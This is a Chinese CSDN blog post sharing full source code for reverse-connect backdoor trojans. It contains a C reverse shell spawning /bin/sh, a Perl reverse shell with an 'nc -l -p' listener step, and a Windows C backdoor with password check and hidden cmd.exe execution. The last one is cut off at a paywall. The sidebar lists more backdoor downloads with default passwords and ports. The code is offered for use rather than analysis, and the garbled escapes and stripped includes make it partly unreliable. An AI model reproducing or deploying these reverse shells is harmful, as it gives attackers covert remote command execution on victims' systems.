五个反弹后门的源代码

最新推荐文章于 2024-07-29 15:05:17 发布
最新推荐文章于 2024-07-29 15:05:17 发布
阅读量1.9k 收藏 2
点赞数
文章标签: socket null struct attributes header service
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kgdiwss/article/details/425632
版权
本文分享了三个不同编程语言(C、Perl)编写的反弹木马源代码,包括作者iceblood的C语言版本、cnhackTNT的Perl版本和dahubaobao的C语言版本。每个代码都有详细的注释和使用说明,涉及TCP连接、密码验证、命令执行等功能。这些反弹木马展示了如何建立与远程系统的连接并执行命令。
摘要由CSDN通过智能技术生成


第一个反弹木马代码:作者 iceblood

代码

#include
#include
#include
#include
#include
#include
#include

void usage();
char shell[]="/bin/sh";
char message[]="s8s8 welcome/n";
int sock;
int main(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}

struct sockaddr_in server;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Couldn't make socket!/n");      exit(-1);
}

server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);

if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
printf("Could not connect to remote shell!/n");
exit(-1);
}
send(sock, message, sizeof(message), 0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,"/bin/sh",(char *)0);
close(sock);
return 1;
}

void usage(char *prog[]) {
   printf("/t/ts8s8 connect back door/n/n");
printf("/t

  显得有点简陋了,不过还能讲究的过去。。如果需要可以写成LKM,呵呵。

第二个反弹木马代码:作者cnhackTNT

代码

#!/usr/bin/perl
#http://www.s8s8.net
#cnhackTNT[AT]hotmail.com

use strict;
use Socket;
use Cwd;
use IO::Handle;

if ( @ARGV < 1 ) {
print <<"EOF";
usage:
nc -l -p PORT(default 66666) on your local system first,then
Perl $0 Remote IP Remote_port(default 66666)
Type 'quit' to exit or press Enter to gain shell when u under the 'S8S8 console'.
Enjoy ur shell!
Welcome to http://www.s8s8.net
EOF
exit;
}
my $remote      = $ARGV[0];
my $remote_port = $ARGV[1] || 66666;
my $proto       = getprotobyname('tcp');
my $pack_addr   = sockaddr_in( $remote_port, inet_aton($remote) );
my $path        = cwd();
my $shell       = '/bin/sh -i';

socket( SOCK, AF_INET, SOCK_STREAM, $proto ) || die "socket error: $!";
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect( SOCK, $pack_addr ) || die "connection error : $!";
open STDIN,  ">&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
print "You are in $path/n";
print "Welcome to www.s8s8.net/nEnjoy ur shell./n/n[S8S8 console]>";

while () {
   chomp;
   if ( lc($_) eq 'quit' ) {
       print "/nWelcome to www.s8s8.net";
       print "/nByeBye~~~!/n";
       exit;
   }
   elsif ($_) {
       system($shell);
       print "/n[S8S8 console]>";
   }
   else {
       print "/n[S8S8 console]>";
   }
}
close SOCK;
exit;

  很简单,功能和上面sql兄那个c版本的差不多。

第三个反弹木马代码:作者dahubaobao

代码

#include
#include
#include
#include
#include

#pragma comment (lib,"ws2_32.lib")

#define PASSSUCCESS "Password success!/n"
#define PASSERROR "Password error./n"
#define BYEBYE "ByeBye!/n"

#define WSAerron WSAGetLastError()
#define erron GetLastError()

VOID WINAPI EXEBackMain (LPVOID s); 
//BOOL EXEBackMain (SOCKET sock);

int main (int argc, TCHAR *argv[])
{
   SOCKET sock=NULL;
   struct sockaddr_in sai;
   TCHAR UserPass[20]={0};    //用户设置密码缓冲
   TCHAR PassBuf[20]={0};     //接收密码缓冲
   TCHAR PassBanner[]="/nPassword:";
   TCHAR Banner[]="---------dahubaobao backdoor---------/n";

   if (argc!=4)
   {
       fprintf(stderr,"Code by dahubaobao/n"
               "Usage:%s [DestIP] [Port] [Password]/n",argv[0]);
       return 0;
   }

   sai.sin_family=AF_INET;

   //判断参数合法性,并填充地址结构
   //IP地址不能大于15
   if (strlen(argv[1])<=15)
       sai.sin_addr.s_addr=inet_addr(argv[1]);
   else
   {
       #ifdef DEBUGMSG
              printf("Internet address no larger than /"15/"/n");
       #endif
       goto Clean;
   }

   //端口不能小于0 && 大于65535
   if (atoi(argv[2])>0&&atoi(argv[2])<65535)
       sai.sin_port=htons(atoi(argv[2]));
   else
   {
       #ifdef DEBUGMSG
              printf("Port no less than /"0/" and larger than /"65535/"");
       #endif
       goto Clean;
   }

   //密码最大16位
   if (strlen(argv[3])<=16)
       strcpy(UserPass,argv[3]);     //复制密码
   else
   {
       #ifdef DEBUGMSG
              printf("Please connect password error/n");
       #endif
       goto Clean;
   }

   while (TRUE)
   {
          WSADATA wsadata;
          BOOL ThreadFlag=FALSE;
          DWORD ThreadID=0;
          int nRet=0;

          nRet=WSAStartup(MAKEWORD(2,2),&wsadata);     //初始化

          if (nRet)
          {
              #ifdef DEBUGMSG
                     printf("WSAStartup() error: %d/n",nRet);
              #endif
              return 0;
          }

          sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

          if (sock==INVALID_SOCKET)
          {
              #ifdef DEBUGMSG
                     printf("socket() GetLastError reports %d/n",WSAerron);
              #endif
              goto Clean;
          }
         
          nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr));

          if (nRet!=SOCKET_ERROR)
          {
              nRet=send(sock,Banner,sizeof (Banner),0);

              if (nRet==SOCKET_ERROR)
              {
                  #ifdef DEBUGMSG
                         sprintf(MsgError,"send() GetLastError reports %d/n",WSAerron);
                         send(sock,MsgError,sizeof (MsgError),0);
                  #endif       
                  goto Clean;
              }

              while (TRUE)
              {
                     nRet=send(sock,PassBanner,sizeof (PassBanner),0);

                     if (nRet==SOCKET_ERROR)
                     {
                         #ifdef DEBUGMSG
                                sprintf(MsgError,"send() GetLastError reports %d/n",WSAerron);
                                send(sock,MsgError,sizeof (MsgError),0);
                         #endif
                         goto Clean;
                     }

                     nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0);

                     if (strnicmp(PassBuf,UserPass,strlen(UserPass))==0)
                     {
                         #ifdef DEBUGMSG
                                send(sock,PASSSUCCESS,sizeof (PASSSUCCESS),0);
                         #endif
                         ThreadFlag=TRUE;
                         break;
                     }
                     else
                     {
                         #ifdef DEBUGMSG
                                send(sock,PASSERROR,sizeof (PASSERROR),0);
                         #endif
                         continue;
                     }

                     if (nRet==SOCKET_ERROR)
                     {
                         #ifdef DEBUGMSG
                                sprintf(MsgError,"recv() GetLastError reports %d/n",WSAerron);
                                send(sock,MsgError,sizeof (MsgError),0);
                         #endif
                         goto Clean;
                     }

                     Sleep(100);
              }
             
              if (ThreadFlag)
              {
                  //EXEBackMain(sock);
                 
                  CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,
                              (LPVOID)sock,0,&ThreadID);
              }

          }

          Sleep(1000);
   }

   Clean:
         if (sock!=NULL)
             closesocket(sock);

         WSACleanup();
         return 0;
}

VOID WINAPI EXEBackMain (LPVOID s)
//BOOL EXEBackMain (SOCKET sock)
{   
    SOCKET sock=(SOCKET)s;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    HANDLE hRead=NULL,hWrite=NULL;
    TCHAR CmdSign[]="/ndahubaobao://>";
   
    while (TRUE)
    {
           TCHAR MsgError[50]={0};     //错误消息缓冲
           TCHAR Cmdline[300]={0};     //命令行缓冲
           TCHAR RecvBuf[1024]={0};    //接收缓冲
           TCHAR SendBuf[2048]={0};    //发送缓冲
           SECURITY_ATTRIBUTES sa;
           DWORD bytesRead=0;
           int ret=0;

           sa.nLength=sizeof(SECURITY_ATTRIBUTES);
           sa.lpSecurityDescriptor=NULL;
           sa.bInheritHandle=TRUE;

           //创建匿名管道
           if (!CreatePipe(&hRead,&hWrite,&sa,0))
           {
               #ifdef DEBUGMSG
                      sprintf(MsgError,"CreatePipe() GetLastError reports %d/n",erron);
                      send(sock,MsgError,sizeof (MsgError),0);
               #endif         
               goto Clean;
           }

           si.cb=sizeof(STARTUPINFO);
           GetStartupInfo(&si);
           si.hStdError=hWrite;
           si.hStdOutput=hWrite;    //进程(cmd)的输出写入管道
           si.wShowWindow=SW_HIDE;
           si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

           GetSystemDirectory(Cmdline,sizeof (Cmdline));   //获取系统目录
           strcat(Cmdline,"//cmd.exe /c ");                //拼接cmd

           ret=send(sock,CmdSign,sizeof (CmdSign),0);      //向目标发送提示符

           if (ret==SOCKET_ERROR)<

最低0.47元/天 解锁文章
kgdiwss
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
反弹木马(改进版,含全部代码)
02-23
反弹木马的改进版,功能进一步加强!!!
后门程序源码wxhshell
07-02
wxhshell V1.0是我根据winshell编写的。winshell是一个非常不错的后门程序,但是现在已经<br>有些过时了,于是我写了一个新的wxhshell,在这款后门里我采用了端口复用技术,因此可<br>以突破一些防火墙。其运行不影响正常端口的工作。<br>注意:本后门对于采用了独占方式的端口无法绑定,经测试XP系统端口135,445,1025,1028,<br>1045无法绑定,其他端口基本上都可以。由于当前的防火墙对系统端口屏蔽比较严,因此这<br>应该算不上缺陷。<br>用UPX压缩后还不到35k,比winshell还小。可以说在后门里算是非常小的了。<br>密码:xuhuanlingzhe<br>服务名:Wxhshell<br>服务显示名:Wxhshell Service<br>服务描述信息:Wrsky Windows CmdShell Service<br>注册表键名:Wxhshell<br>默认端口:5000<br>最大连接数:100
五个反弹后门源代码[转]
02-01 1790
第一个反弹木马代码:作者 iceblood代码#include #include #include #include #include #include #include void usage();char shell[]="/bin/sh";char message[]="s8s8 welcome/n";int sock;int main(int argc, char *argv[]) {if(
我在代码里面故意留个后门漏洞,结果发生了...
最新发布
程序IT圈
07-29 50
大家好,我是小猿!昨天我在逛知乎的时候,看到了这么一个问题:我看到了三个非常有意思的回答,分享给大家一看。首先是这个为了防止项目交付后收不到尾款埋下后门的回答:答主:特立独行的猪链接:https://www.zhihu.com/question/531724027/answer/2487270093早年给某台企做外包项目,定制一个Android系统的ROM。开发费用16万,一年期维护费用2万。开发...
反弹木马——本质上就是一个开80端口的CS程序,伪造自己在浏览网页
djph26741的博客
10-11 443
反弹端口型木马分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口,为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端...
后门程序BDoor及源码
05-02 1338
提交时间:2005-04-22提交用户:ffantasyYD工具分类:后门程序运行平台:Windows工具大小:316825 Bytes文件MD5 :95e120d97967a3679dfdbd82985ea1ca工具来源:http://www.uestc.edu.cn/web/default.aspx这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码
反弹端口木马源码
Foxfile_Hom的专栏
09-12 1337
// BingToCmd.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "BingToCmd.h" #include #include #include #include #include #pragma comment(lib,"ws
经典反向后门源代码(可用)vc++6.0反弹木马
12-14
在IT安全领域,"经典反向后门源代码(可用)vc++6.0反弹木马"是一个关于恶意软件开发和网络安全的话题。反向后门,通常被称为反弹shell或反向连接后门,是一种特殊类型的恶意软件,它允许攻击者在受害者的计算机上获得...
hershell - Go语言反弹Shell后门.zip
07-18
- **源代码**:Go语言的源代码文件,展示了如何构建反弹Shell的功能,包括连接回攻击服务器、接收命令并执行、返回结果等逻辑。 - **编译脚本**:用于构建可执行文件的脚本,可能包含平台特定的编译选项。 - **测试...
lonely-shell - Go语言实现的反弹Shell后门.zip
07-18
在“lonely-shell-master”目录下,我们可以看到项目的源代码、配置文件以及可能的测试脚本。 Lonely-shell的工作流程大致如下: 1. **部署阶段**:攻击者在目标系统上植入lonely-shell的可执行文件,通常通过利用...
linux后门N种姿势.pdf
08-07
后门是一种恶意代码,被设计为提供对被攻击系统的非法访问权限,通常由攻击者在入侵系统后植入。攻击者可以利用后门在任何时候访问系统,执行命令或窃取信息,而不会被合法用户发现。 后门有许多类型,但大致可以...
著名后门nameless源代码NameLess BackDoor V1.14(稳定版)
09-14
著名后门nameless的源代码 可以自己修改 虽然有点老 但是思路还是很值得借鉴的
后门
02-18
后门
完整B/S后门开发实战VC源代码
03-15
完整B/S后门开发实战 关键字:B/S后门
反弹后门的实现(附源代码及编译好的程序,免费下载)
weixin_39423611的博客
09-08 664
反弹后门是什么 https://www.freebuf.com/articles/web/166732.html 源代码及编译好的程序 https://pan.baidu.com/s/1fQvRbt8UKO3ol5_cZrAGnw 源代码 client #include <stdio.h> #include <winsock2.h> #pragma comment(lib,...
反弹端口型木马
rongwenbin的专栏
04-25 4238
首先要知道反弹端口的原理: 简单地说,就是由木马的服务端主动连接客户端所在IP对应的电脑的80端口。相信没有哪个防火墙会拦截这样的连接(因为它们一般认为这是用户在浏览网页),所以反弹端口型木马可以穿墙。 以下是在“网络神偷”的介绍中挖下来的:道高一尺、魔高一丈,不知哪位高人分析了防火墙的特性后发现:防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。于是,与一般的软件相
包含详细注释的pingback后门C源代码
07-06 782
#include #include #include //#include #include #define ICMP_ECHO 8          // ICMP回显请求报文的类型值为8 #define ICMP_ECHOREPLY 0      // ICMP回显应答报文的类型值为0 #define SNIFFER_ICMP_SIZE 101    // 监听ICMP包的大? #d
Java源代码静态分析后门检测技术
"基于静态分析的java源代码后门检测技术研究" 这篇研究论文主要探讨了在信息安全领域如何利用静态分析来检测Java源代码中的后门问题。后门是指在软件中故意留下的隐藏通道,允许未经授权的访问或控制,这对WEB工程...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值